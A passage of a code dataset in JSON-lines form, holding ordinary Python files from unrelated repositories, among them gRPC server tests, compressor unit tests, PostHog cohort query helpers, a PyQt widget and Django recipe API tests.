f\"{nok}More than one of the properties http, ws or queue are true\"\n assert (int(tags[\"http\"] == \"true\") +\n int(tags[\"ws\"] == \"true\") + int(tags[\"queue\"] == \"true\") > 0), \\\n f\"{nok}Of the http, queue or ws properties there must be one with true\"\n\n usecase[\"role\"] = roleHttp # <- default role\n apigw = tags[\"apigw\"]\n\n if tags[\"http\"] == \"true\":\n usecase[\"method\"] = usecase[\"method\"].upper()\n assert usecase[\"method\"] in [\"GET\", \"DELETE\", \"UPDATE\", \"POST\"]\n assert \"route\" in usecase\n usecase[\"role\"] = roleHttp\n # Map if its need\n if usecase[\"method\"] == \"UPDATE\":\n usecase[\"method\"] = \"PUT\"\n\n if apigw == \"internal\":\n usecase[\"apigateway\"] = internalAPIGW\n elif apigw == \"customer\":\n usecase[\"apigateway\"] = customerAPIGW\n elif apigw == \"receptor\":\n usecase[\"apigateway\"] = externalResourcesAPIGW\n elif apigw == \"none\":\n usecase[\"apigateway\"] = \"none\"\n else:\n raise AssertionError(f\"\\n{nok}There is no compatible api gateway\")\n\n elif tags[\"ws\"] == \"true\":\n usecase[\"role\"] = roleWS\n if apigw == \"customer\":\n usecase[\"apigateway\"] = customerAPIGWWS\n else:\n raise AssertionError(f\"\\n{nok}There is no compatible api gateway\")\n elif tags[\"queue\"] == \"true\":\n usecase[\"role\"] = roleWS\n usecase[\"apigateway\"] = 'none'\n else:\n usecase[\"apigateway\"] = 'none'\n\n # Microservice\n tags[\"ms\"] = repoName.split('.')[0]\n\n # Stage\n usecase[\"stage\"] = stage\n\n # AWS Layers\n usecase[\"layers\"] = \" \".join(nextArgs)\n\n # Cacheable: if the operation does not change over time, many caches are allowed,\n # and it means that the operation will return the same if the same parameters are received.\n usecase[\"cacheable\"] = usecase.get(\"cacheable\", False)\n tags[\"cacheable\"] = __boolToString(usecase[\"cacheable\"])\n\n # Need authentication\n usecase[\"needAuthentication\"] = usecase.get(\"needAuthentication\", False)\n tags[\"needAuthentication\"] = __boolToString(usecase[\"needAuthentication\"])\n\n usecase[\"envs\"] = \"\".join(f\",{k}='{v}'\" for k, v in\n {**usecase.get(\"envs\", {}), **config.get(\"envs\", {})}.items())\n usecase[\"tagstring\"] = \",\".join(f\"{k}='{v}'\" for k, v in tags.items())\n return usecase\n","repo_name":"datikz/build-payload-and-metadata.datikzpipelinescript","sub_path":"buildPayload/utils/checkTagsAndCompleteInfo.py","file_name":"checkTagsAndCompleteInfo.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71228215527","text":"import concurrent.futures\nimport contextlib\nimport unittest\nimport threading\nimport queue\n\nimport grpc_kv_server\n\nimport grpc\nimport key_value_pb2\nimport key_value_pb2_grpc\n\n_TEST_VALUES = (\"air-bud\", \"doug-the-dog\", \"the-one-from-full-house\")\n\n\n@contextlib.contextmanager\ndef _test_server():\n server, port = grpc_kv_server._run_server_non_blocking('localhost', 0)\n try:\n yield server, port\n finally:\n server.stop(0)\n\n\nclass TestGrpcKvServer(unittest.TestCase):\n def test_without_grpc(self):\n kv_store = grpc_kv_server.KeyValueStore()\n kv_store.store(\"golden-retriever\", \"pancakes\")\n self.assertEqual(\"pancakes\", kv_store.get(\"golden-retriever\"))\n\n def test_watch_without_grpc(self):\n kv_store = grpc_kv_server.KeyValueStore()\n kv_store.store(\"golden-retriever\", \"pancakes\")\n start_event = threading.Event()\n stop_event = threading.Event()\n\n def _gather_responses():\n start_event.set()\n return list(kv_store.watch(\"golden-retriever\", stop_event))\n\n thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)\n responses_future = thread_pool.submit(_gather_responses)\n start_event.wait()\n for value in _TEST_VALUES:\n kv_store.store(\"golden-retriever\", value)\n stop_event.set()\n responses = responses_future.result()\n self.assertSequenceEqual(_TEST_VALUES, responses)\n\n def test_with_grpc_in_a_single_process(self):\n with _test_server() as (server, port):\n with grpc.insecure_channel('localhost:{}'.format(port)) as channel:\n stub = key_value_pb2_grpc.KeyValueStoreStub(channel)\n create_request = key_value_pb2.CreateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\",\n value=\"pancakes\",\n ))\n create_response = stub.CreateRecord(\n create_request, wait_for_ready=True)\n self.assertEqual(create_request.record, create_response)\n\n get_request = key_value_pb2.GetRecordRequest(\n name=\"golden-retriever\")\n get_response = stub.GetRecord(get_request)\n self.assertEqual(get_response, create_request.record)\n\n def test_server_watch(self):\n with _test_server() as (server, port):\n with grpc.insecure_channel('localhost:{}'.format(port)) as channel:\n stub = key_value_pb2_grpc.KeyValueStoreStub(channel)\n create_request = key_value_pb2.CreateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\",\n value=\"pancakes\",\n ))\n stub.CreateRecord(create_request, wait_for_ready=True)\n watch_request = key_value_pb2.WatchRecordRequest(\n name=\"golden-retriever\")\n\n responses = queue.Queue()\n\n def _gather_responses(stub, request):\n response_iterator = stub.WatchRecord(request)\n for response in response_iterator:\n responses.put(response.value)\n if response.value == _TEST_VALUES[-1]:\n break\n response_iterator.cancel()\n\n thread_pool = concurrent.futures.ThreadPoolExecutor(\n max_workers=1)\n gather_future = thread_pool.submit(_gather_responses, stub,\n watch_request)\n _SENTINEL = \"sentinel\"\n # Add meaningless values until the Watch connection has been confirmed\n # to be established.\n while responses.empty():\n stub.UpdateRecord(\n key_value_pb2.UpdateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\", value=_SENTINEL)))\n # Append test values.\n for value in _TEST_VALUES:\n stub.UpdateRecord(\n key_value_pb2.UpdateRecordRequest(\n record=key_value_pb2.Record(\n name=\"golden-retriever\", value=value)))\n # Ensure the queue has been filled with the collected values.\n gather_future.result()\n filtered_responses = [\n response for response in responses.queue\n if response != _SENTINEL\n ]\n self.assertSequenceEqual(_TEST_VALUES, filtered_responses)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gnossen/grpc-example","sub_path":"grpc_kv_server/src/test/kv_server_test.py","file_name":"kv_server_test.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39826072669","text":"from rest_utils import json_response, json_error, catch_exception\nfrom img_borders import laplace, prewitt, roberts, sobel\nfrom img_utils import base64_to_bw_img, img_to_base64\n\nBorderMethods = dict(\n prewitt=prewitt,\n laplace=laplace,\n roberts=roberts,\n sobel=sobel,\n)\n\n\ndef process_image(blob_img, method):\n img = base64_to_bw_img(blob_img)\n return BorderMethods[method](img)\n\n\n@catch_exception\ndef image_borders(request):\n if request.headers.get('content-type') != 'application/json':\n return json_error(\"Use application/json\")\n\n request_json = request.get_json(silent=True)\n if not request_json:\n return json_error(\"JSON is invalid\")\n\n image = request_json['image']\n method = request_json['method']\n\n processed_img = process_image(image, method)\n return json_response(dict(\n image=img_to_base64(processed_img).decode('utf-8')\n ))\n","repo_name":"Fredy/GCP_Things","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41858677126","text":"# [String] 문자열 다루기 기본 - 프로그래머스 1단계\nstr = 'a234'\n\ndef solution(s):\n answer = True\n\n if(len(s) != 4 and len(s) != 6):\n return False\n for i in s:\n if i.isdigit() == False:\n answer = False\n break\n\n return answer\n\n\nsolution(str)\n","repo_name":"908jyw/pythonAlgorithm","sub_path":"string/basicOfString.py","file_name":"basicOfString.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36945287218","text":"from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel\r\nfrom PyQt5.QtGui import QPainter, QColor, QFont\r\nfrom PyQt5.QtCore import Qt\r\n\r\n\r\nclass Button(QPushButton):\r\n def __init__(self, parent=None, msg='', left=0, top=0):\r\n super().__init__(parent)\r\n self.setGeometry(left, top, 150, 50)\r\n self.setStyleSheet(\"background-color: rgb(72, 61, 139); color: rgb(255, 255, 255);\")\r\n self.setText(msg)\r\n self.setFont(QFont('kaiti', 20))\r\n\r\n def paintEvent(self, event):\r\n super().paintEvent(event)\r\n painter = QPainter(self)\r\n painter.setRenderHint(QPainter.Antialiasing)\r\n painter.drawText(self.rect(), Qt.AlignCenter, self.text())\r\n\r\n\r\nclass MyWidget(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setGeometry(100, 100, 400, 300)\r\n self.setWindowTitle('PyQt Button Example')\r\n\r\n self.button = Button(self, 'Click me', 125, 125)\r\n self.button.clicked.connect(self.onButtonClick)\r\n\r\n def onButtonClick(self):\r\n print('Button clicked')\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n\r\n app = QApplication(sys.argv)\r\n widget = MyWidget()\r\n widget.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"milab-neuq/chess_gui","sub_path":"chineseChess_gui/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71361636327","text":"import os\nimport re\n\nimport sys\nsys.path.append(\"..\")\nfrom core.nlp import NLP\nfrom core.extractor import Extractor\n\nif __name__ == '__main__':\n input_path = '../../data/dev.txt' # input path\n output_path = '../../data/knowledge_triple.json' # output path of json file \n output_path2 = '../../data/triple_result.txt' # output path of triple txt file \n if os.path.isfile(output_path):\n os.remove(output_path)\n # os.mkdir(output_path)\n\n print('Start extracting...')\n\n nlp = NLP()\n num = 1 # Number of triples\n\n\n with open(input_path, 'r', encoding='utf-8') as f_in:\n # divide sentences\n origin_sentences = re.split('[。?!;]|\\n', f_in.read())\n \n for origin_sentence in origin_sentences:\n # delete sentences less than 6 in length\n if (len(origin_sentence) < 6):\n continue\n #print('*****')\n # print(origin_sentence)\n # segment\n lemmas = nlp.segment(origin_sentence)\n # POS Tagging\n words_postag = nlp.postag(lemmas)\n # Named Entity Recognition\n words_netag = nlp.netag(words_postag)\n # dependency parsing\n sentence = nlp.parse(words_netag)\n #sprint(sentence.to_string())\n\t\t\t\n\t\t\t#start extract entity and relation\n extractor = Extractor()\n num = extractor.extract(origin_sentence, sentence, output_path,output_path2, num)\n","repo_name":"devWangBin/nlp-test","sub_path":"ERE/extract_demo.py","file_name":"extract_demo.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19096615252","text":"class Solution:\n def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n result=[0]*len(nums)\n res=0\n for i in range(2,len(nums)):\n if nums[i]-nums[i-1]==nums[i-1]-nums[i-2]:\n result[i]=1+result[i-1]\n res+=result[i]\n return res\n \n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0413-arithmetic-slices/0413-arithmetic-slices.py","file_name":"0413-arithmetic-slices.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72452935209","text":"new_list = [1,2,3]\nresult = new_list[1]\n\nif 1 in new_list:\n print(True)\n\nfor n in new_list:\n if n ==1:\n print(True)\n\n# arr.insert() is O(n) since each value needs to be moved an index\n# arr.append() is O(1) since its added to the end of array\n# arr.delete() is O(n) since needs to move all the indexes over\n\n# append is O(1) bc of how python interprets it","repo_name":"Alejandro-Jaime-Pozas/algos_DS","sub_path":"arrays.py","file_name":"arrays.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1651777058","text":"\"\"\"\nSimple wrapper around a logger.\n\"\"\"\n\nfrom logging import Logger\n\nfrom common_utils import text_tools\n\n\nclass HudLogger(object):\n \"\"\"\n Wrapper around a normal logger so stuff gets printed too.\n \"\"\"\n\n def get_logger(\n self\n ) -> Logger:\n return self.__logger__\n\n def log_info_message(\n self,\n message_to_log: str,\n print_to_screen: bool = True\n ):\n \"\"\" Log and print at Info level \"\"\"\n if print_to_screen:\n print(\"LOG:\" + text_tools.escape(message_to_log))\n self.__logger__.info(text_tools.escape(message_to_log))\n\n return message_to_log\n\n def log_warning_message(\n self,\n message_to_log: str\n ):\n \"\"\" Log and print at Warning level \"\"\"\n print(\"WARN:\" + message_to_log)\n self.__logger__.warning(text_tools.escape(message_to_log))\n\n return message_to_log\n\n def __init__(\n self,\n logger: Logger\n ):\n self.__logger__ = logger\n","repo_name":"JohnMarzulli/StratuxHud","sub_path":"common_utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"53"} +{"seq_id":"39510882719","text":"from typing import List\n\nfrom posthog.hogql import ast\nfrom posthog.hogql.context import HogQLContext\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.escape_sql import escape_clickhouse_string\nfrom posthog.hogql.parser import parse_expr\n\n\ndef cohort_subquery(cohort_id, is_static) -> ast.Expr:\n if is_static:\n sql = \"(SELECT person_id FROM static_cohort_people WHERE cohort_id = {cohort_id})\"\n else:\n sql = \"(SELECT person_id FROM raw_cohort_people WHERE cohort_id = {cohort_id} GROUP BY person_id, cohort_id, version HAVING sum(sign) > 0)\"\n return parse_expr(sql, {\"cohort_id\": ast.Constant(value=cohort_id)}, start=None) # clear the source start position\n\n\ndef cohort_query_node(node: ast.Expr, context: HogQLContext) -> ast.Expr:\n return cohort(node, [node], context)\n\n\ndef cohort(node: ast.Expr, args: List[ast.Expr], context: HogQLContext) -> ast.Expr:\n arg = args[0]\n if not isinstance(arg, ast.Constant):\n raise HogQLException(\"cohort() takes only constant arguments\", node=arg)\n\n from posthog.models import Cohort\n\n if isinstance(arg.value, int) and not isinstance(arg.value, bool):\n cohorts = Cohort.objects.filter(id=arg.value, team_id=context.team_id).values_list(\"id\", \"is_static\", \"name\")\n if len(cohorts) == 1:\n context.add_notice(\n start=arg.start,\n end=arg.end,\n message=f\"Cohort #{cohorts[0][0]} can also be specified as {escape_clickhouse_string(cohorts[0][2])}\",\n fix=escape_clickhouse_string(cohorts[0][2]),\n )\n return cohort_subquery(cohorts[0][0], cohorts[0][1])\n raise HogQLException(f\"Could not find cohort with id {arg.value}\", node=arg)\n\n if isinstance(arg.value, str):\n cohorts = Cohort.objects.filter(name=arg.value, team_id=context.team_id).values_list(\"id\", \"is_static\")\n if len(cohorts) == 1:\n context.add_notice(\n start=arg.start,\n end=arg.end,\n message=f\"Searching for cohort by name. Replace with numeric ID {cohorts[0][0]} to protect against renaming.\",\n fix=str(cohorts[0][0]),\n )\n return cohort_subquery(cohorts[0][0], cohorts[0][1])\n elif len(cohorts) > 1:\n raise HogQLException(f\"Found multiple cohorts with name '{arg.value}'\", node=arg)\n raise HogQLException(f\"Could not find a cohort with the name '{arg.value}'\", node=arg)\n\n raise HogQLException(\"cohort() takes exactly one string or integer argument\", node=arg)\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/functions/cohort.py","file_name":"cohort.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"36894500016","text":"\"\"\"Tamp compressor tests.\n\nOur custom huffman size table:\n\n huffman_coding = {\n 2: 0b0,\n 3: 0b11,\n 4: 0b1000,\n 5: 0b1011,\n 6: 0b10100,\n 7: 0b100100,\n 8: 0b100110,\n 9: 0b101011,\n 10: 0b1001011,\n 11: 0b1010100,\n 12: 0b10010100,\n 13: 0b10010101,\n 14: 0b10101010,\n 15: 0b100111,\n \"FLUSH\": 0b10101011,\n }\n\"\"\"\n\nimport io\nimport unittest\n\nfrom tamp import ExcessBitsError\n\ntry:\n import micropython\nexcept ImportError:\n micropython = None\n\n\nCompressors = []\ncompresses = []\n\nif micropython:\n from tamp.compressor_viper import Compressor as ViperCompressor\n from tamp.compressor_viper import compress as viper_compress\n\n Compressors.append(ViperCompressor)\n compresses.append(viper_compress)\nelse:\n from tamp.compressor import Compressor as PyCompressor\n from tamp.compressor import compress as py_compress\n\n Compressors.append(PyCompressor)\n compresses.append(py_compress)\n\n try:\n from tamp._c_compressor import Compressor as CCompressor\n from tamp._c_compressor import compress as c_compress\n\n Compressors.append(CCompressor)\n compresses.append(c_compress)\n except ImportError:\n pass\n\n\nclass TestCompressor(unittest.TestCase):\n def test_compressor_default(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n\n bytes_written = 0\n with io.BytesIO() as f:\n compressor = Compressor(f)\n bytes_written += compressor.write(test_string)\n bytes_written += compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n compressor.close()\n self.assertEqual(actual, expected)\n self.assertEqual(bytes_written, len(expected))\n\n # Test Context Manager\n bytes_written = 0\n with io.BytesIO() as f, Compressor(f) as compressor:\n bytes_written += compressor.write(test_string)\n bytes_written += compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n self.assertEqual(bytes_written, len(expected))\n\n def test_compressor_input_buffer(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n\n with io.BytesIO() as f:\n compressor = Compressor(f)\n compressor.write(b\"f\")\n compressor.write(b\"oo\")\n compressor.write(b\" fo\")\n compressor.write(b\"o foo\")\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_7bit(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n expected = bytes(\n # fmt: off\n [\n 0b010_10_0_0_0, # header (window_bits=10, literal_bits=7)\n 0b1_1100110, # literal \"f\"\n 0b0_0_001000, # the pre-init buffer contains \"oo \" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b0011_1_010, # literal \" \"\n 0b0000_0_100, # size=4 -> 0b1000\n 0b0_0000000,\n 0b000_0_11_00, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b000000000, # index 0 -> 0b0000000000\n # no padding!\n ]\n # fmt: on\n )\n with io.BytesIO() as f:\n compressor = Compressor(f, literal=7)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_predefined_dictionary(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n init_string = b\"foo foo foo\"\n dictionary = bytearray(1 << 8)\n dictionary[: len(init_string)] = init_string\n\n expected = bytes(\n # fmt: off\n [\n 0b000_10_1_0_0, # header (window_bits=8, literal_bits=7, dictionary provided)\n 0b0_1010100, # match-size 11\n 0b00000000, # At index 0\n # no padding!\n ]\n # fmt: on\n )\n\n with io.BytesIO() as f:\n compressor = Compressor(f, window=8, literal=7, dictionary=dictionary)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_predefined_dictionary_incorrect_size(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n dictionary = bytearray(1 << 8)\n with io.BytesIO() as f, self.assertRaises(ValueError):\n Compressor(f, window=9, literal=7, dictionary=dictionary)\n\n def test_oob_2_byte_pattern(self):\n \"\"\"Viper implementation had a bug where a pattern of length 2 could be detected at the end of a string (going out of bounds by 1 byte).\"\"\"\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string_extended = bytearray(b\"Q\\x00Q\\x00\")\n test_string = memoryview(test_string_extended)[:3] # b\"Q\\x00Q\"\n\n with io.BytesIO() as f:\n compressor = Compressor(f)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n\n # Q == 0b0101_0001\n expected = bytes(\n [\n 0b010_11_00_0,\n 0b1_0101_000,\n 0b1_1_0000_00,\n 0b00_1_0101_0,\n 0b001_00000,\n ]\n )\n assert actual == expected\n\n def test_excess_bits(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor), io.BytesIO() as f:\n compressor = Compressor(f, literal=7)\n\n with self.assertRaises(ExcessBitsError):\n compressor.write(b\"\\xFF\")\n compressor.flush()\n\n def test_single_shot_compress_text(self):\n for compress in compresses:\n with self.subTest(compress=compress):\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n self.assertEqual(compress(\"foo foo foo\"), expected)\n\n def test_single_shot_compress_binary(self):\n for compress in compresses:\n with self.subTest(compress=compress):\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n self.assertEqual(compress(b\"foo foo foo\"), expected)\n\n def test_invalid_conf(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor), io.BytesIO() as f:\n with self.assertRaises(ValueError):\n Compressor(f, literal=4)\n with self.assertRaises(ValueError):\n Compressor(f, window=16)\n","repo_name":"BrianPugh/tamp","sub_path":"tests/test_compressor.py","file_name":"test_compressor.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"72449597609","text":"\"\"\"BLEU SCORE\n\n@author: vasudevgupta\n\"\"\"\nimport nltk\nimport numpy as np\nimport pandas as pd\n\n\nclass Bleu:\n\n def __init__(self, N=4):\n \"\"\"GET THE BLEU SCORE\n INPUT THE TARGET AND PREDICTION\n \"\"\"\n self.N = N\n\n def get_score(self, target, pred):\n\n ngrams_prec = []\n for n in range(1, self.N+1):\n precision = self.get_Ngram_precision(target, pred, n)\n ngrams_prec.append(precision)\n\n len_target = np.mean([len(targ) for targ in target]) if type(\n target[0]) == list else len(target)\n\n len_penalty = 1 if len(pred) >= len_target else (\n 1 - np.exp(len_target/len(pred)))\n\n self.bleu_scr = len_penalty*(np.product(ngrams_prec)**0.25)\n\n return self.bleu_scr\n\n def get_Ngram_precision(self, target, pred, n):\n\n new_pred = list(nltk.ngrams(pred, n))\n count_pred = self._counter(new_pred)\n\n # if there are more than 2 sents in reference\n if type(target[0]) == list:\n\n new_target = [list(nltk.ngrams(target[i], n))\n for i in range(len(target))]\n count_target = [self._counter(new_target[i])\n for i in range(len(new_target))]\n\n scores = [[np.min([count_pred[tok], count_target[i][tok]])\n if tok in new_target[i] else 0\n for tok in count_pred.keys()]\n for i in range(len(new_target))]\n\n final_score = np.max(scores, axis=0)\n\n else:\n\n new_target = list(nltk.ngrams(target, n))\n count_target = self._counter(new_target)\n\n final_score = [np.min([count_pred[tok], count_target[tok]])\n if tok in new_target else 0 for tok in count_pred.keys()]\n\n # just for ensuring that no errors happen\n len_pred = len(new_pred) if len(new_pred) > 0 else 1\n\n precisions = np.sum(final_score)/len_pred\n\n return precisions\n\n def _counter(self, ls):\n \"\"\"Returns a dict with freq of each element in ls\n \"\"\"\n freq = pd.Series(ls).value_counts()\n return dict(freq)\n\n\n# just for verifying its working\nif __name__ == '__main__':\n target = ' cat is walking in the garden'.split()\n pred = 'the cat is walking in the garden'.split()\n bl = Bleu(N=4)\n print(bl.get_score(target, pred))\n","repo_name":"thevasudevgupta/tf-lightning","sub_path":"tf_lightning/experimental/bleu.py","file_name":"bleu.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463226343","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestKlayGetBlockWithConsensusInfoByNumber(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.blockTag = \"0x6e0431\"\n\n def test_post(self):\n self.response = self.w3.klay.get_block_with_consensus_info_by_number(\n self.blockTag\n )\n self.assertRegex(self.response[\"hash\"], r'^0x.*$')\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/block/test_get_block_with_consensus_info_by_number.py","file_name":"test_get_block_with_consensus_info_by_number.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"32000760453","text":"import tempfile\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom PIL import Image\n\nfrom core.models import Recipe, Ingredient, Tag\nfrom recipe.serializers import RecipeSerializer, RecipeDetailSerializer\n\nRECIPES_URL = reverse('recipe:recipe-list')\n\n\ndef get_recipe_detail_url(pk: int):\n return reverse('recipe:recipe-detail', args=[pk])\n\n\ndef get_image_upload_url(pk: int):\n return reverse('recipe:recipe-upload-image', args=[pk])\n\n\nclass PublicRecipesApiTest(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for retrieving recipes.\"\"\"\n res = self.client.get(RECIPES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipesApiTest(TestCase):\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n 'test@gmail.com',\n 'password123',\n )\n self.client.force_authenticate(self.user)\n\n def _create_recipe(self, **params):\n return Recipe.objects.create(**params)\n\n def test_retrieve_recipes(self):\n \"\"\"Test retrieving recipes.\"\"\"\n recipe_1 = self._create_recipe(\n title='Recipe 1', user=self.user, time_minutes=5, price=10.00\n )\n recipe_1.ingredients.add(\n Ingredient.objects.create(name='cucumber', user=self.user),\n Ingredient.objects.create(name='tomato', user=self.user),\n )\n recipe_1.tags.add(\n Tag.objects.create(name='tag1', user=self.user),\n Tag.objects.create(name='tag2', user=self.user),\n )\n self._create_recipe(\n title='Recipe 2', user=self.user, time_minutes=3, price=12.50\n )\n expected_recipes = RecipeSerializer(\n Recipe.objects.all().order_by('-id'), many=True\n )\n\n res = self.client.get(RECIPES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, expected_recipes.data)\n\n def test_recipes_limited_to_user(self):\n \"\"\"Test retrieving only user's tags.\"\"\"\n self._create_recipe(\n title='Recipe 1', user=self.user, time_minutes=6, price=4.00\n )\n other_user = get_user_model().objects.create_user(\n 'other@gmail.com', 'password123'\n )\n self._create_recipe(\n title='Recipe 2', user=other_user, time_minutes=1, price=4.00\n )\n expected_recipes = RecipeSerializer(\n Recipe.objects.filter(user=self.user), many=True\n )\n\n res = self.client.get(RECIPES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, expected_recipes.data)\n\n def test_recipe_detail(self):\n \"\"\"Test retrieving recipe detail data.\"\"\"\n recipe = Recipe.objects.create(\n title='Recipe 1', user=self.user, time_minutes=6, price=4.00\n )\n tag = Tag.objects.create(user=self.user, name='Tag 1')\n ingredient = Ingredient.objects.create(user=self.user, name='Ingredient 1')\n recipe.tags.add(tag)\n recipe.ingredients.add(ingredient)\n serializer = RecipeDetailSerializer(recipe)\n\n url = get_recipe_detail_url(recipe.id)\n res = self.client.get(url)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n self.assertEqual(res.data['tags'][0]['name'], tag.name)\n self.assertEqual(res.data['ingredients'][0]['name'], ingredient.name)\n\n def test_recipe_detail_of_other_user(self):\n \"\"\"Make 